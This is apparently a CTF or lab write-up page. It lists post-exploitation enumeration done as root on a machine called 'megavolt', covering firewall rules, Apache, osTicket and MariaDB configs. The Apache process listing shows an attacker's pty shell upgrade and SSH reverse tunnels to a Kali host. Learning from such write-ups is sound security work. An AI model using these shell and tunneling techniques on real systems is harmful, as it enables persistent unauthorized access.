Beyond
This is the "beyond" page, on which additional post-exploitation enumeration and assessment are conducted as the root
user after compromising the target system.
Firewall
[root@megavolt ~]# ll /etc/firewalld
total 8
-rw-r--r--. 1 root root 2006 Aug 8 2019 firewalld.conf
drwxr-x---. 2 root root 6 Aug 8 2019 helpers
drwxr-x---. 2 root root 6 Aug 8 2019 icmptypes
drwxr-x---. 2 root root 6 Aug 8 2019 ipsets
-rw-r--r--. 1 root root 272 Aug 8 2019 lockdown-whitelist.xml
drwxr-x---. 2 root root 6 Aug 8 2019 services
drwxr-x---. 2 root root 46 Oct 6 2020 zones
[root@megavolt ~]# cat /etc/firewalld/firewalld.conf | grep -v '^[#/]'
DefaultZone=public
MinimalMark=100
CleanupOnExit=yes
Lockdown=no
IPv6_rpfilter=yes
IndividualCalls=no
LogDenied=off
AutomaticHelpers=system
[root@megavolt ~]# cat /etc/firewalld/zones/public.xml | grep -v '^[#/]'
<?xml version="1.0" encoding="utf-8"?>
<zone>
<short>Public</short>
<description>For use in public areas. You do not trust the other computers on networks to not harm your computer. Only selected incoming connections are accepted.</description>
<service name="ssh"/>
<service name="dhcpv6-client"/>
</zone>
ssh
[root@megavolt ~]# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate NEW,RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
ACCEPT tcp -- anywhere anywhere tcp dpt:http
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:domain state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:domain state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:http state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:http state NEW,ESTABLISHED
ACCEPT udp -- anywhere anywhere udp dpt:domain state NEW,ESTABLISHED
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere
N/A
httpd
[root@megavolt ~]# systemctl status httpd.service
● httpd.service - The Apache HTTP Server
Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled; vendor preset: disabled)
Active: active (running) since Fri 2024-08-02 15:06:11 EDT; 7 months 9 days ago
Docs: man:httpd(8)
man:apachectl(8)
Main PID: 1064 (httpd)
Status: "Total requests: 5481; Current requests/sec: 0; Current traffic: 0 B/sec"
CGroup: /system.slice/httpd.service
├─1064 /usr/sbin/httpd -DFOREGROUND
├─1281 /usr/sbin/httpd -DFOREGROUND
├─1282 /usr/sbin/httpd -DFOREGROUND
├─2008 /usr/sbin/httpd -DFOREGROUND
├─2011 /usr/sbin/httpd -DFOREGROUND
├─2012 /usr/sbin/httpd -DFOREGROUND
├─2028 /usr/sbin/httpd -DFOREGROUND
├─2029 /usr/sbin/httpd -DFOREGROUND
├─2030 /usr/sbin/httpd -DFOREGROUND
├─2031 /usr/sbin/httpd -DFOREGROUND
├─2425 /usr/sbin/httpd -DFOREGROUND
├─6177 bash
├─6210 python3 -c import pty; pty.spawn("/bin/bash")
├─6211 /bin/bash
├─7615 ssh -f -N -R 2828:127.0.0.1:2828 kali@192.168.45.192
└─7717 ssh -f -N -R 4444:127.0.0.1:4444 kali@192.168.45.192
[root@megavolt ~]# cat /usr/lib/systemd/system/httpd.service | grep -v '^[#/]'
[Unit]
Description=The Apache HTTP Server
After=network.target remote-fs.target nss-lookup.target
Documentation=man:httpd(8)
Documentation=man:apachectl(8)
[Service]
Type=notify
EnvironmentFile=/etc/sysconfig/httpd
ExecStart=/usr/sbin/httpd $OPTIONS -DFOREGROUND
ExecReload=/usr/sbin/httpd $OPTIONS -k graceful
ExecStop=/bin/kill -WINCH ${MAINPID}
KillSignal=SIGCONT
PrivateTmp=true
[Install]
WantedBy=multi-user.target
[root@megavolt ~]# cat /etc/sysconfig/httpd | grep -v '^[#/]'
LANG=C
[root@megavolt ~]# cat /etc/httpd/conf/httpd.conf | grep -v '^[#/]'
ServerRoot "/etc/httpd"
Listen 80
Include conf.modules.d/*.conf
User apache
Group apache
ServerAdmin root@localhost
<Directory />
AllowOverride none
Require all denied
</Directory>
DocumentRoot "/var/www/html"
<Directory "/var/www">
AllowOverride None
Require all granted
</Directory>
<Directory "/var/www/html">
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
<IfModule dir_module>
DirectoryIndex index.html
</IfModule>
<Files ".ht*">
Require all denied
</Files>
ErrorLog "logs/error_log"
LogLevel warn
<IfModule log_config_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
<IfModule logio_module>
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
</IfModule>
CustomLog "logs/access_log" combined
</IfModule>
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
</IfModule>
<Directory "/var/www/cgi-bin">
AllowOverride None
Options None
Require all granted
</Directory>
<IfModule mime_module>
TypesConfig /etc/mime.types
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
</IfModule>
AddDefaultCharset UTF-8
<IfModule mime_magic_module>
MIMEMagicFile conf/magic
</IfModule>
EnableSendfile on
IncludeOptional conf.d/*.conf
conf.d/*.conf
[root@megavolt ~]# ll /etc/httpd/conf.d/
total 24
-rw-r--r--. 1 root root 366 Apr 2 2020 README
-rw-r--r--. 1 root root 2926 Apr 2 2020 autoindex.conf
-rw-r--r--. 1 root root 320 Oct 6 2020 osticket.conf
-rw-r--r--. 1 root root 1252 Sep 29 2020 php.conf
-rw-r--r--. 1 root root 1252 Nov 27 2019 userdir.conf
-rw-r--r--. 1 root root 824 Nov 27 2019 welcome.conf
[root@megavolt ~]# cat /etc/httpd/conf.d/osticket.conf | grep -v '^[#/]'
<Directory "/var/www/html">
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
<Directory "/var/www/html/attachments">
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>
<IfModule dir_module>
DirectoryIndex index.php
</IfModule>
[root@megavolt ~]# cat /etc/httpd/conf.d/userdir.conf | grep -v '^[#/]'
<IfModule mod_userdir.c>
#
# UserDir is disabled by default since it can confirm the presence
# of a username on the system (depending on home directory
# permissions).
#
UserDir disabled
#
# To enable requests to /~user/ to serve the user's public_html
# directory, remove the "UserDir disabled" line above, and uncomment
# the following line instead:
#
#UserDir public_html
</IfModule>
<Directory "/home/*/public_html">
AllowOverride FileInfo AuthConfig Limit Indexes
Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
Require method GET POST OPTIONS
</Directory>
mariadb
[root@megavolt ~]# systemctl status mariadb.service
● mariadb.service - MariaDB database server
Loaded: loaded (/usr/lib/systemd/system/mariadb.service; enabled; vendor preset: disabled)
Active: active (running) since Fri 2024-08-02 15:06:13 EDT; 7 months 9 days ago
Process: 1153 ExecStartPost=/usr/libexec/mariadb-wait-ready $MAINPID (code=exited, status=0/SUCCESS)
Process: 1068 ExecStartPre=/usr/libexec/mariadb-prepare-db-dir %n (code=exited, status=0/SUCCESS)
Main PID: 1152 (mysqld_safe)
CGroup: /system.slice/mariadb.service
├─1152 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
└─1451 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log...
[root@megavolt ~]# cat /usr/lib/systemd/system/mariadb.service | grep -v '^[#/]'
[Unit]
Description=MariaDB database server
After=syslog.target
After=network.target
[Service]
Type=simple
User=mysql
Group=mysql
ExecStartPre=/usr/libexec/mariadb-prepare-db-dir %n
ExecStart=/usr/bin/mysqld_safe --basedir=/usr
ExecStartPost=/usr/libexec/mariadb-wait-ready $MAINPID
TimeoutSec=300
PrivateTmp=true
[Install]
WantedBy=multi-user.target